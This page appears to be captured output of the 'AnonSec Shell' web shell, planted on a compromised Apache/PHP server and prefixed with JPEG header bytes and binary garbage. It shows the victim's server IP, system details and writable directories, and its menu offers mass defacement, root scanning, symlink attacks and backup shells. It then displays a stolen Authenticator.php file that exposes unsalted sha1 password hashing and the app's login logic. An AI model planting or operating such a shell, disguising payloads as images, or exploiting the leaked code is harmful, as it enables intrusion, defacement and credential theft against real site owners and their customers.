JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 31.31.79.131  /  Your IP : 172.18.0.1   [ Reverse IP ]
Web Server : Apache/2.4.38 (Debian)
System : Linux a1822d00732a 4.15.0-39-generic #42-Ubuntu SMP Tue Oct 23 15:48:01 UTC 2018 x86_64
User : www-data ( 33)
PHP Version : 7.1.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/app/model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/app/model/Authenticator.php
<?php

use Nette\Security;
use Nette\Utils\Strings;
use Nette\Database\Context;

/**
 * Users authenticator.
 */
class Authenticator implements Security\IAuthenticator
{

    private $clientReq = "
        id,
        email,
        bonus_program,
        bonus_points,
        name,
        surname,
        salesman,
        price_profile,
        course_default,
        country,
        user_group_id,
        prefix,
        company
    ";
    private $adminReq = "id,username,role";
    private $database;

	public function __construct(Context $database)
	{
        $this->database = $database;
	}

    /**
     * @param array $credentials
     * @return Security\Identity|Security\IIdentity
     * @throws Security\AuthenticationException
     */
    public function authenticate(array $credentials)
	{
        list($username, $password) = $credentials;
        $password = $this->calculateHash($password);
		$userData = $this->getAdminUserData($username, $password);
        $userIdentity = false;

        if(is_array($userData["admin"]) && count($userData["admin"]) > 1){
            $userIdentity["id"]["administrator"] = $userData["admin"]["id"];
            $userIdentity["role"][] = "administrator";
            $userIdentity["data"]["administrator"] = $userData["admin"];
        }
        if(is_array($userData["client"]) && count($userData["client"]) > 1){
            $this->database->table("client")
                ->where(['id'=>$userData["client"]["id"]])
                ->update(['logged_at'=>new DateTime()]);
            $userIdentity["id"]["client"] = $userData["client"]["id"];
            $userIdentity["role"][] = "client";
            $userIdentity["data"]["client"] = $userData["client"];

            unset($userIdentity["data"]["client"]['password']);
        }
		return new Nette\Security\Identity($userIdentity["id"], $userIdentity["role"], $userIdentity["data"]);
	}



	/**
	 * Computes salted password hash.
	 * @param  string
     * @param  string
	 * @return string
	 */
	public function calculateHash($password, $salt = NULL)
	{
		return sha1($password);
	}

    /**
     * @param $username
     * @param $password
     * @return array
     * @throws Security\AuthenticationException
     */
    private function getAdminUserData($username, $password){
        $adminRow = $this->getAdminData($username,$password);
        $clientRow = $this->getClientData($username,$password);
        if($adminRow == false && $clientRow == false){
            throw new Security\AuthenticationException('Toto uživatelské jméno neexistuje.', self::IDENTITY_NOT_FOUND);
        }/* elseif ($adminRow && $adminRow->role !== 'administrator') {
            throw new Security\AuthenticationException('Nejste administrátorem.', self::IDENTITY_NOT_FOUND);
        }*/ elseif ($adminRow != false && $clientRow == false) {
            if($this->getIdbyId($adminRow->id, 0)){
                $clientRow = $this->getClientDataById($this->getIdbyId($adminRow->id, 0)->toArray()["client_id"]);
            }else{
                $clientRow = null;
            }
        }elseif($adminRow == false && $clientRow != false){
            if($this->getIdbyId($clientRow->id, 1)){
                $adminRow = $this->getAdminDataById($this->getIdbyId($clientRow->id, 1)->toArray()["administrator_id"]);
            }else{
                $adminRow = null;
            }
        }
        if($adminRow == false){
            $adminRow = null;
        }else{
            $adminRow = $adminRow->toArray();
        }
        if($clientRow == false){
            $clientRow = null;
        }else{
            $clientRow = $clientRow->toArray();
        }
        return array("admin" => $adminRow, "client" => $clientRow);
    }

    /**
     * @param $username
     * @param $password
     * @return false|\Nette\Database\Table\ActiveRow
     */
    private function getClientData($username, $password){
        return $this->database->table("client")->select($this->clientReq)->where('email', $username)->where('password', $password)->where('is_active', 1)->fetch();
    }

    /**
     * @param $username
     * @param $password
     * @return false|\Nette\Database\Table\ActiveRow
     */
    private function getAdminData($username, $password){
        return $this->database->table("administrator")->select($this->adminReq)->where('username', $username)->where('password', $password)->fetch();
    }

    /**
     * @param $id
     * @return false|\Nette\Database\Table\ActiveRow
     */
    private function getClientDataById($id){
        return $this->database->table("client")->select($this->clientReq)->where('id', $id)->where('is_active', 1)->fetch();
    }

    /**
     * @param $id
     * @return false|\Nette\Database\Table\ActiveRow
     */
    private function getAdminDataById($id){
        return $this->database->table("administrator")->select($this->adminReq)->where('id', $id)->fetch();
    }

    /**
     * @param $id
     * @param int $method
     * @return bool|false|\Nette\Database\Table\ActiveRow
     */
    private function getIdbyId($id, $method = 0){
        if($method == 0){
            return $this->database->table("link_admin_client")->select("client_id")->where('administrator_id', $id)->fetch();
        }elseif($method = 1){
            return $this->database->table("link_admin_client")->select("administrator_id")->where('client_id', $id)->fetch();
        }else{
            return false;
        }
    }

}

Anon7 - 2022
AnonSec Team